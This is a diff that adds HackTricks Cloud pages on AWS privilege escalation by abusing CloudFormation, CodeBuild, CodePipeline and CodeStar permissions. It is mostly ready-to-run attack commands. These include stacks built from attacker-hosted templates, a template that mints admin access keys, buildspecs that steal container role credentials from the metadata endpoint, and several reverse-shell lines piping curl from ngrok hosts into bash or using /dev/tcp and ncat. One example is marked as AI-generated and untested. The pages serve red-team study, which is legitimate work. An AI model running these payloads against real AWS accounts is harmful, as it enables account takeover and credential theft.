+{% endhint %} + +## cloudformation + +For more information about cloudformation check: + +{% content-ref url="../../aws-services/aws-cloudformation-and-codestar-enum.md" %} +[aws-cloudformation-and-codestar-enum.md](../../aws-services/aws-cloudformation-and-codestar-enum.md) +{% endcontent-ref %} + +### `iam:PassRole`, `cloudformation:CreateStack` + +An attacker with these permissions **can escalate privileges** by crafting a **CloudFormation stack** with a custom template, hosted on their server, to **execute actions under the permissions of a specified role:** + +```bash +aws cloudformation create-stack --stack-name \ + --template-url http://attacker.com/attackers.template \ + --role-arn +``` + +In the following page you have an **exploitation example** with the additional permission **`cloudformation:DescribeStacks`**: + +{% content-ref url="iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md" %} +[iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md](iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md) +{% endcontent-ref %} + +**Potential Impact:** Privesc to the cloudformation service role specified. + +### `iam:PassRole`, (`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`) + +In this case you can a**buse an existing cloudformation stack** to update it and escalate privileges as in the previous scenario: + +```bash +aws cloudformation update-stack \ + --stack-name privesc \ + --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ + --role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \ + --capabilities CAPABILITY_IAM \ + --region eu-west-1 +``` + +The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack. + +**Potential Impact:** Privesc to the cloudformation service role specified. 
+ +### `cloudformation:UpdateStack` | `cloudformation:SetStackPolicy` + +If you have this permission but **no `iam:PassRole`** you can still **update the stacks** used and abuse the **IAM Roles they have already attached**. Check the previous section for exploit example (just don't indicate any role in the update). + +The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack. + +**Potential Impact:** Privesc to the cloudformation service role already attached. + +### `iam:PassRole`,((`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`) + +An attacker with permissions to **pass a role and create & execute a ChangeSet** can **create/update a new cloudformation stack abuse the cloudformation service roles** just like with the CreateStack or UpdateStack. + +The following exploit is a **variation of the**[ **CreateStack one**](./#iam-passrole-cloudformation-createstack) using the **ChangeSet permissions** to create a stack. + +```bash +aws cloudformation create-change-set \ + --stack-name privesc \ + --change-set-name privesc \ + --change-set-type CREATE \ + --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ + --role arn:aws:iam::947247140022:role/CloudFormationAdmin \ + --capabilities CAPABILITY_IAM \ + --region eu-west-1 + +echo "Waiting 2 mins to change the stack" +sleep 120 + +aws cloudformation execute-change-set \ + --change-set-name privesc \ + --stack-name privesc \ + --region eu-west-1 + +echo "Waiting 2 mins to execute the stack" +sleep 120 + +aws cloudformation describe-stacks \ + --stack-name privesc \ + --region eu-west-1 +``` + +The `cloudformation:SetStackPolicy` permission can be used to **give yourself `ChangeSet` permissions** over a stack and perform the attack. + +**Potential Impact:** Privesc to cloudformation service roles. 
+ +### (`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`) + +This is like the previous method without passing **IAM roles**, so you can just **abuse already attached ones**, just modify the parameter: + +``` +--change-set-type UPDATE +``` + +**Potential Impact:** Privesc to the cloudformation service role already attached. + +### `iam:PassRole`,(`cloudformation:CreateStackSet` | `cloudformation:UpdateStackSet`) + +An attacker could abuse these permissions to create/update StackSets to abuse arbitrary cloudformation roles. + +**Potential Impact:** Privesc to cloudformation service roles. + +### `cloudformation:UpdateStackSet` + +An attacker could abuse this permission without the passRole permission to update StackSets to abuse the attached cloudformation roles. + +**Potential Impact:** Privesc to the attached cloudformation roles. + +## References + +* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md new file mode 100644 index 0000000000..8147ce3818 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md @@ -0,0 +1,109 @@ +# iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like: + +```json +{ + "Resources": { + "AdminUser": { + "Type": "AWS::IAM::User" + }, + "AdminPolicy": { + "Type": "AWS::IAM::ManagedPolicy", + "Properties": { + "Description" : "This policy allows all actions on all resources.", + "PolicyDocument": { + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "*" + ], + "Resource": "*" + }] + }, + "Users": [{ + "Ref": "AdminUser" + }] + } + }, + "MyUserKeys": { + "Type": "AWS::IAM::AccessKey", + "Properties": { + "UserName": { + "Ref": "AdminUser" + } + } + } + }, + "Outputs": { + "AccessKey": { + "Value": { + "Ref": "MyUserKeys" + }, + "Description": "Access Key ID of Admin User" + }, + "SecretKey": { + "Value": { + "Fn::GetAtt": [ + "MyUserKeys", + "SecretAccessKey" + ] + }, + "Description": "Secret Key of Admin User" + } + } +} +``` + +Then **generate the cloudformation stack**: + +```bash +aws cloudformation create-stack --stack-name privesc \ + --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ + --role arn:aws:iam::[REDACTED]:role/adminaccess \ + --capabilities CAPABILITY_IAM --region us-west-2 +``` + +**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**: + +```bash +aws cloudformation describe-stacks \ + --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \ + --region uswest-2 +``` + +### References + +* [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md new file mode 100644 index 0000000000..ab4b9f46f2 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md @@ -0,0 +1,377 @@ +# AWS - Codebuild Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## codebuild + +Get more info in: + +{% content-ref url="../aws-services/aws-codebuild-enum.md" %} +[aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md) +{% endcontent-ref %} + +### `codebuild:StartBuild` | `codebuild:StartBuildBatch` + +Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project: + +{% tabs %} +{% tab title="StartBuild" %} +{% code overflow="wrap" %} +```bash +cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml +``` +{% endcode %} +{% endtab %} + +{% tab title="StartBuildBatch" %} +{% code overflow="wrap" %} +```bash +cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml +``` +{% endcode %} +{% endtab %} +{% endtabs %} + +**Note**: The difference between these two commands is that: + +* `StartBuild` triggers a single build job using a specific `buildspec.yml`. +* `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel). + +**Potential Impact:** Direct privesc to attached AWS Codebuild roles. + +### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) + +An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one. 
+ +{% tabs %} +{% tab title="Example1" %} +```bash +# Enumerate then env and get creds +REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" + +# Get rev shell +REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash" + +JSON="{ + \"name\": \"codebuild-demo-project\", + \"source\": { + \"type\": \"NO_SOURCE\", + \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" + }, + \"artifacts\": { + \"type\": \"NO_ARTIFACTS\" + }, + \"environment\": { + \"type\": \"LINUX_CONTAINER\", + \"image\": \"aws/codebuild/standard:1.0\", + \"computeType\": \"BUILD_GENERAL1_SMALL\" + }, + \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" +}" + + +REV_PATH="/tmp/rev.json" + +printf "$JSON" > $REV_PATH + +# Create project +aws codebuild create-project --cli-input-json file://$REV_PATH + +# Build it +aws codebuild start-build --project-name codebuild-demo-project + +# Wait 3-4 mins until it's executed +# Then you can access the logs in the console to find the AWS role token in the output + +# Delete the project +aws codebuild delete-project --name codebuild-demo-project +``` +{% endtab %} + +{% tab title="Example2" %} +{% code overflow="wrap" %} +```bash +# Generated by AI, not tested +# Create a buildspec.yml file with reverse shell command +echo 'version: 0.2 +phases: + build: + commands: + - curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml + +# Upload the buildspec to the bucket and give access to everyone +aws s3 cp buildspec.yml s3:/buildspec.yml + +# Create a new CodeBuild project with the buildspec.yml file +aws codebuild create-project --name reverse-shell-project --source type=S3,location=/buildspec.yml --artifacts type=NO_ARTIFACTS --environment computeType=BUILD_GENERAL1_SMALL,image=aws/codebuild/standard:5.0,type=LINUX_CONTAINER --service-role --timeout-in-minutes 60 + +# Start a build with the new project +aws codebuild start-build 
--project-name reverse-shell-project + +``` +{% endcode %} +{% endtab %} +{% endtabs %} + +**Potential Impact:** Direct privesc to any AWS Codebuild role. + +{% hint style="warning" %} +In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**. + +This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` + +Add that to the URL **`http://169.254.170.2/`** and you will be able to dump the role credentials. + +Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**. +{% endhint %} + +### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) + +Just like in the previous section, if instead of creating a build project you can modify it, you can indicate the IAM Role and steal the token + +```bash +REV_PATH="/tmp/codebuild_pwn.json" + +# Enumerate then env and get creds +REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" + +# Get rev shell +REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash" + +# You need to indicate the name of the project you want to modify +JSON="{ + \"name\": \"\", + \"source\": { + \"type\": \"NO_SOURCE\", + \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" + }, + \"artifacts\": { + \"type\": \"NO_ARTIFACTS\" + }, + \"environment\": { + \"type\": \"LINUX_CONTAINER\", + \"image\": \"aws/codebuild/standard:1.0\", + \"computeType\": \"BUILD_GENERAL1_SMALL\" + }, + \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" +}" + +printf "$JSON" > $REV_PATH + +aws codebuild update-project --cli-input-json file://$REV_PATH + +aws codebuild start-build 
--project-name codebuild-demo-project +``` + +**Potential Impact:** Direct privesc to any AWS Codebuild role. + +### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) + +Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**. + +{% tabs %} +{% tab title="StartBuild" %} +{% code overflow="wrap" %} +```sh +REV_PATH="/tmp/codebuild_pwn.json" + +# Enumerate then env and get creds +REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" + +# Get rev shell +REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" + +JSON="{ + \"name\": \"\", + \"source\": { + \"type\": \"NO_SOURCE\", + \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" + }, + \"artifacts\": { + \"type\": \"NO_ARTIFACTS\" + }, + \"environment\": { + \"type\": \"LINUX_CONTAINER\", + \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", + \"computeType\": \"BUILD_GENERAL1_SMALL\", + \"imagePullCredentialsType\": \"CODEBUILD\" + } +}" + +# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild! 
+ +printf "$JSON" > $REV_PATH + +aws codebuild update-project --cli-input-json file://$REV_PATH + +aws codebuild start-build --project-name codebuild-demo-project +``` +{% endcode %} +{% endtab %} + +{% tab title="StartBuildBatch" %} +{% code overflow="wrap" %} +```sh +REV_PATH="/tmp/codebuild_pwn.json" + +# Get rev shell +REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" + +# You need to indicate the name of the project you want to modify +JSON="{ + \"name\": \"project_name\", + \"source\": { + \"type\": \"NO_SOURCE\", + \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\" + }, + \"artifacts\": { + \"type\": \"NO_ARTIFACTS\" + }, + \"environment\": { + \"type\": \"LINUX_CONTAINER\", + \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", + \"computeType\": \"BUILD_GENERAL1_SMALL\", + \"imagePullCredentialsType\": \"CODEBUILD\" + } +}" + +printf "$JSON" > $REV_PATH + +# Note how it's used a image from AWS public ECR instead from dockerhub as dockerhub rate limits CodeBuild! + +aws codebuild update-project --cli-input-json file://$REV_PATH + +aws codebuild start-build-batch --project-name codebuild-demo-project +``` +{% endcode %} +{% endtab %} +{% endtabs %} + +**Potential Impact:** Direct privesc to attached AWS Codebuild roles. + +### SSM + +Having **enough permissions to start a ssm session** it's possible to get **inside a Codebuild project** being built. + +The codebuild project will need to have a breakpoint: + +
phases:
+  pre_build:
+    commands:
+      - echo Entered the pre_build phase...
+      - echo "Hello World" > /tmp/hello-world
+      - codebuild-breakpoint
+
+ +And then: + +```bash +aws codebuild batch-get-builds --ids --region --output json +aws ssm start-session --target --region +``` + +For more info [**check the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html). + +### (`codebuild:StartBuild` | `codebuild:StartBuildBatch`), `s3:GetObject`, `s3:PutObject` + +An attacker able to start/restart a build of a specific CodeBuild project which stores its `buildspec.yml` file on an S3 bucket the attacker has write access to, can obtain command execution in the CodeBuild process. + +Note: the escalation is relevant only if the CodeBuild worker has a different role, hopefully more privileged, than the one of the attacker. + +```bash +aws s3 cp s3:///buildspec.yml ./ + +vim ./buildspec.yml + +# Add the following lines in the "phases > pre_builds > commands" section +# +# - apt-get install nmap -y +# - ncat -e /bin/sh + +aws s3 cp ./buildspec.yml s3:///buildspec.yml + +aws codebuild start-build --project-name + +# Wait for the reverse shell :) +``` + +You can use something like this **buildspec** to get a **reverse shell**: + +{% code title="buildspec.yml" %} +```yaml +version: 0.2 + +phases: + build: + commands: + - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1 +``` +{% endcode %} + +**Impact:** Direct privesc to the role used by the AWS CodeBuild worker that usually has high privileges. + +{% hint style="warning" %} +Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload +{% endhint %} + +More details could be found [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/). + +**Potential Impact:** Direct privesc to attached AWS Codebuild roles. 
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md new file mode 100644 index 0000000000..d9fdae9de0 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md @@ -0,0 +1,63 @@ +# AWS - Codepipeline Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## codepipeline + +For more info about codepipeline check: + +{% content-ref url="../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md" %} +[aws-datapipeline-codepipeline-codebuild-and-codecommit.md](../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) +{% endcontent-ref %} + +### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution` + +When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them. + +Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...) + +I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:` + +During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise: + +![](<../../../.gitbook/assets/image (276).png>) + +![](<../../../.gitbook/assets/image (181).png>) + +### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution` + +It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions. 
+ +### `codepipeline:pollforjobs` + +[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html): + +> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. This API also **returns any secret values defined for the action**. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md new file mode 100644 index 0000000000..106d50e48a --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md @@ -0,0 +1,99 @@ +# AWS - Codestar Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Codestar + +You can find more information about codestar in: + +{% content-ref url="codestar-createproject-codestar-associateteammember.md" %} +[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md) +{% endcontent-ref %} + +### `iam:PassRole`, `codestar:CreateProject` + +With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page: + +{% content-ref url="iam-passrole-codestar-createproject.md" %} +[iam-passrole-codestar-createproject.md](iam-passrole-codestar-createproject.md) +{% endcontent-ref %} + +### `codestar:CreateProject`, `codestar:AssociateTeamMember` + +This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**. + +```bash +PROJECT_NAME="supercodestar" + +aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \ + --name $PROJECT_NAME \ + --id $PROJECT_NAME + +echo "Waiting 1min to start the project" +sleep 60 + +USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"') + +aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \ + --project-id $PROJECT_NAME \ + --user-arn "$USER_ARN" \ + --project-role "Owner" \ + --remote-access-allowed +``` + +If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember` + +**Potential Impact:** Privesc to the codestar policy generated. 
You can find an example of that policy in: + +{% content-ref url="codestar-createproject-codestar-associateteammember.md" %} +[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md) +{% endcontent-ref %} + +### `codestar:CreateProjectFromTemplate` + +1. **Create a New Project:** + * Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project. + * Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**. + * This access specifically targets a stack associated with the `CodeStarWorker--CloudFormation` IAM role. +2. **Update the Target Stack:** + * With the granted CloudFormation permissions, proceed to update the specified stack. + * The stack's name will typically conform to one of two patterns: + * `awscodestar--infrastructure` + * `awscodestar--lambda` + * The exact name depends on the chosen template (referencing the example exploit script). +3. **Access and Permissions:** + * Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack. + * Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further. + +For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\ +You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar\_createprojectfromtemplate\_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py) + +**Potential Impact:** Privesc to cloudformation IAM role. 
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md new file mode 100644 index 0000000000..883d19f188 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md @@ -0,0 +1,115 @@ +# codestar:CreateProject, codestar:AssociateTeamMember + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
